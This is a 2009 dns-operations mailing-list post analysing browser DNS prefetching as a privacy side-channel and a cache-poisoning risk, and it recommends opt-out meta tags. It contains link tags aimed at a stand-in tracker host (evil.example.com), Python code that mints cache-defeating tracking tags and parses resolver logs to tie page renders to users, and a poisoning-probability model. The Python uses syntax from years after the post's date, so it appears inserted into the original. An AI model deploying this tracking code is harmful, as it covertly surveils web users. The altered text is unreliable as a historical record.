[dns-operations] DNS pre-resolution
David Dagon
dagon at cc.gatech.edu
Sat Dec 5 22:21:43 UTC 2009
On Sat, Dec 05, 2009 at 06:49:30AM -0600, Jorge Amodio wrote:
> Andrew is assuming that chrome will lookup the dns name for every
> single URL on a page, I believe Roskind on the video said it was not
> as simple as that, also the response could be cached somewhere and
> the query never hit his servers.
If domains in each page are unique (e.g., specific to the session,
or just a hash of the IP), then caching is not an obstacle:
<link rel="dns-prefetch" href="http://${UNIQUE_IDENT}.evil.example.com/">
Many readers of this list have invented similar solutions, e.g., to
probe for open recursives. And there are patent applications for web
bugs, and many older implementations of such schemes. When building a
DNS tracking system, it is not hard to overcome caching.
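A minimal sketch (Python; the evil.example.com zone and helper name
are hypothetical) of how a tracker would mint such cache-defeating
links:

    import uuid

    def tracking_prefetch_tag(zone="evil.example.com"):
        # A fresh label per render guarantees a cache miss, so the
        # query always reaches the tracker's authoritative server.
        unique_ident = uuid.uuid4().hex
        return ('<link rel="dns-prefetch" '
                f'href="http://{unique_ident}.{zone}/">')

    print(tracking_prefetch_tag())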
> After seeing the video I was playing a little bit (I use chrome as
> my default browser) looking at the query log of my local bind
> caching server and I can see on the log how my desktop machine sends
> the queries for some names but not all, even if I hover over some
> URLs.
DNS prefetching is a side-channel (or a type of covert channel). The
resolution behavior is automated and controlled by the remote website.
Users (the people leaking information) have a few boolean controls to
turn prefetch off. It is on by default.
There are actually three types of prefetching, across the various
browser implementations:
a) "DOM-based speculative resolution" occurs when a browser or
similar rendering engine loads a webpage. I.e., it looks up
most of the links on a page.
Mozilla (FF 3.5+, and an earlier plugin for FF 3.0) uses an
opt-out approach for this feature. It is on by default, and
toggled by setting the preference "network.dns.disablePrefetch"
to true. The prefetching of domain elements found in HTTPS
documents is turned off by default, however, and can be toggled
on (e.g., for a honeypot deployment, or turned on by malware) by
merely setting the preference network.dns.disablePrefetchFromHTTPS
to false.
Web authors can also control this in HTML, opting their pages out
of prefetching. For this, a new meta element is recognized by
Firefox (and Chrome, etc.):
<meta http-equiv="x-dns-prefetch-control" content="off">
Instead of polluting a page with hrefs (which burden rendering
engines), spammers and trackers can just populate web pages with
invisible link tags:
<link rel="dns-prefetch" href="http://${UNIQUE_IDENT}.evil.example.com/">
At least in Firefox, the network.dns.disablePrefetchFromHTTPS
rule trumps all 'link rel' prefetch instructions.
There evidently was no public design/discussion of this feature,
at least none that I can find. More details were announced at:
https://developer.mozilla.org/En/Controlling_DNS_prefetching
I assume we'll find out the hard way what the creative hackers
can do with this new side-channel. The blogs have suggested
webmail delivery tracking for non-https users.
I can think of one more use. Since FF 3.5 does not appear to
perform duplicate suppression in prefetches (generating multiple
prefetches for the same qname), it opens a birthday window for
poisoning. (E.g., a page with a thousand duplicate 'link rel'
prefetches is millions of times more likely to be poisoned. See
http://www.isoc.org/isoc/conferences/ndss/09/pdf/15.pdf for
discussion.)
I've only tested with small N, but each duplicate doubles
the chances of an attacker's random guess. In pragmatic terms,
this threat is mitigated by the low yield from poisoning a single
browser (1 attack == 1 victim, in most cases). Plus, remote
reach to the stub is often blocked by NAT, etc. I know that Dan
Kaminsky has stated that poisoning of the stubs is also a serious
concern, so perhaps he or others will expand upon this FF
feature.
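To make the duplicate-suppression point concrete, here is a toy
probability model. The assumptions are mine, not a measurement: a
fixed source port, an independent random 16-bit TXID per duplicate
query, and an attacker racing spoofed replies ahead of the real
answer:

    ID_SPACE = 2 ** 16  # 16-bit DNS transaction ID

    def poison_probability(outstanding, spoofed):
        # P(at least one of `outstanding` in-flight duplicates
        # accepts one of `spoofed` forged replies carrying
        # distinct TXID guesses).
        return 1.0 - (1.0 - spoofed / ID_SPACE) ** outstanding

    for n in (1, 10, 100, 1000):
        print(n, round(poison_probability(n, 100), 4))
    # 1 duplicate:     ~0.0015
    # 1000 duplicates: ~0.78, hence the value of a page stuffed
    # with duplicate 'link rel' prefetches.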
Poisoning aside, there is a real opportunity to track users. If
you are a web developer, I would urge the addition of '<meta
http-equiv="x-dns-prefetch-control" content="off">' tags,
particularly when handling third-party content such as text sourced
from user input or advertising networks.
Normally, to track users with image bugs, one has to buy ads and
pay for the clicks. One can potentially use web-bugs as a
cost-free, click-free way to track user rendering of a page.
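The authority side of such a scheme is equally trivial. A sketch,
assuming a BIND-style querylog (the exact format varies across
BIND versions, so the regex is illustrative only):

    import re, sys

    # Matches lines like:
    #   ... client 192.0.2.7#53055: query: <32-hex>.evil.example.com IN A
    QUERY_RE = re.compile(r"client ([\d.]+)#\d+: query: "
                          r"([0-9a-f]{32})\.evil\.example\.com IN A")

    def page_views(logfile):
        # Each unique label maps one rendered page to one resolver.
        with open(logfile) as fh:
            for line in fh:
                m = QUERY_RE.search(line)
                if m:
                    yield m.group(1), m.group(2)

    for resolver, token in page_views(sys.argv[1]):
        print(f"token {token} rendered behind resolver {resolver}")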
Perhaps prefetching is being made smarter (contextual, DOM-aware
fetching) in more recent browsers.
b) "State-based speculative resolution" occurs when an application
experiences a major state change. For example, Chrome resolves
your top N favorite domains on startup. N is thankfully small.
It seems Safari does this as well.
As a practical matter, I think N has to be small, as anyone who
has attempted to synchronously resolve large numbers of domain
names can tell you. Even if done asynchronously, 3-second timeouts
are inevitable in large batch resolutions, taking up valuable queue
space in the local recursives. I therefore speculate that browser
engineers are unlikely to make N very large; a large batch may make
the browser itself appear slow.
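A toy harness (Python; the name list is hypothetical) illustrates
the cost: even with a thread pool, every unresponsive name occupies
a worker for the full timeout, so batch wall-clock time is gated by
the stragglers:

    import socket, time
    from concurrent.futures import ThreadPoolExecutor

    def timed_resolve(name):
        # Blocking stub lookup; NXDOMAIN or a timeout costs the most.
        start = time.monotonic()
        try:
            socket.getaddrinfo(name, 80)
        except socket.gaierror:
            pass
        return name, time.monotonic() - start

    def batch_resolve(names, workers=8):
        with ThreadPoolExecutor(max_workers=workers) as pool:
            return list(pool.map(timed_resolve, names))

    # e.g., batch_resolve(["example.com", "example.net", ...])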
c) "Partial input speculative resolution" occurs when the browser
interprets user input before completion. For example, if you are
typing in the location bar, the browser may attempt to resolve
substrings in the input field, before one has finished typing the
full domain name. (This uses 'effective TLDs' as a heuristic, so
that not every possible substring is resolved.)
I believe this is a pernicious type of resolution, since
substrings are resolved, and 'losers' in the lexical lottery will
include the authorities for .co (a substring of .com) and .ne
(a substring of .net), among others. Chrome does this type of
resolution (v.3, v.4, and ChromeOS).
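As I understand the heuristic (the real implementation is surely
more involved), it amounts to something like this sketch, with a
tiny stand-in for the full effective-TLD list:

    KNOWN_TLDS = {"cn", "co", "com", "ne", "net"}  # illustrative subset

    def speculative_lookups(typed):
        # Yield every keystroke-prefix that ends in a known TLD
        # label; each is a candidate for speculative resolution.
        for i in range(1, len(typed) + 1):
            prefix = typed[:i]
            last_label = prefix.rsplit(".", 1)[-1]
            if "." in prefix and last_label in KNOWN_TLDS:
                yield prefix

    print(list(speculative_lookups("www.cnn.com")))
    # -> ['www.cn', 'www.cnn.co', 'www.cnn.com']

This is exactly the www.cnn.com parse discussed below.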
Ads that include a domain name are the most likely candidates for
typing (since the user lacks a bookmark), and most of these would
end in .com, I suspect. So right now, Chrome users are sending
spurious lookups to .co and other authorities (likely .ne). With
only ~2% of the browser share, this might not matter. I am
concerned that when a million monkeys using IE have partial input
speculative resolution, and type in domains ending in .com, the
volume might be significant.
From a university backbone, here are the most popular authorities
for substrings that would result in non-useful prefetches:
.ne     37.1%
.co     22.6%
.cz      8.7%
.arpa    8.0%
.ga      7.3%
Note that these are TLDs for valid fqdn substrings for all qnames
over a 2-month period, not just those where a user actually typed
something. So the results are not representative and likely reflect
local bias (e.g., .ga is a substring in ".gatech.edu", which is
commonly typed in the local network).
But some 95% of all qnames had some valid fqdn substring (mostly
because of .co/.com). It is not known what portion of that traffic
would come from user typing, as opposed to bookmarks and DOM-driven
resolution. A study is underway.
Judged by more local standards, I personally find it obnoxious
that my browser sends DNS queries to China and Colombia whenever
I type in www.cnn.com. The typed domain is parsed by the
prefetch engine as (((www.cn)n.co)m'\n'), or graphically:
+----------------------------+ Each box contains a valid
| +------------------+ | fqdn, and all are prefetched
| | +--------+ | |
| | | www.cn | n.co | m | '\n'
| | +--------+ | |
| +------------------+ |
+----------------------------+
But that's just my preference to not send unwanted traffic, where
possible. If I ever own a .co domain, I would also find it
obnoxious if other browsers sent queries to my authority based on
partial input. Some DNS operators might be indifferent to the
spurious lookups, or want such traffic.
So if the costs are unknown, or relative to the zone owner, let's
consider the benefits of prefetching. The stated improvement of
prefetching is, by Chrome's own numbers, somewhere between 4% and
10% improved speed, on the order of tens of milliseconds. I
honestly don't know what to make of such a statement, which seems
to defeat itself. Perhaps the western world's need for rapid
loading of "LOL cat videos" trumps any concerns about the
implicit cost transfer in this arrangement. (That is, assuming
unlucky authorities ever need more secondaries to handle the IE
population, should IE perform Chrome-style resolution.)
I don't know if the .co authorities have seen a measurable
increase in traffic, with only ~2% of the browsers running
Chrome. It may be hard to measure against the natural growth of
Internet traffic in general. But anomalous growth (a step or
plateau that cannot otherwise be explained by comparison to zone
size deltas) would be one thing to look for.
Perhaps someone associated with .co's authorities can share that
information. If traffic increase is measurable, one can estimate
the burden when most of the browsers switch. IE makes up, what,
60% of a billion desktops? Surely that's a lot of typing. This
is all speculation. But if DNS typo correction is a
multi-million dollar industry, then browser input is significant.
I think this is worth worrying about.
Lastly, even if the volume of traffic is not large, there might be
many domainer business opportunities around buying substrings of
domains. (E.g., someone might buy 'www.cnn.co', and find some
clever way to monetize the unwanted lookups.) If so, then
perhaps registrars for collision TLDs will enjoy a windfall.
Perhaps my concerns are overstated. I only know from history (e.g.,
DNS pinning attacks) that whenever browsers add innovative DNS
features, a wave of attacks follows. I realize the browser authors are
fine, honest people who only want to improve user experiences. And
besides the covert channel aspect, DNS prefetching is very clever---if
only we can determine the appropriate context for its use.
The process browser developers use to test ideas (blog
announcements, not the IETF) requires that the cost of bad design
be carried by others. This is true of DNS prefetching. I hope DNS
is not the latest battlefield for the browser wars.
--
David Dagon /"\ "When cryptography
dagon at cc.gatech.edu \ / ASCII RIBBON CAMPAIGN is outlawed, bayl
Ph.D. Candidate X AGAINST HTML MAIL bhgynjf jvyy unir
Georgia Inst. of Tech. / \ cevinpl."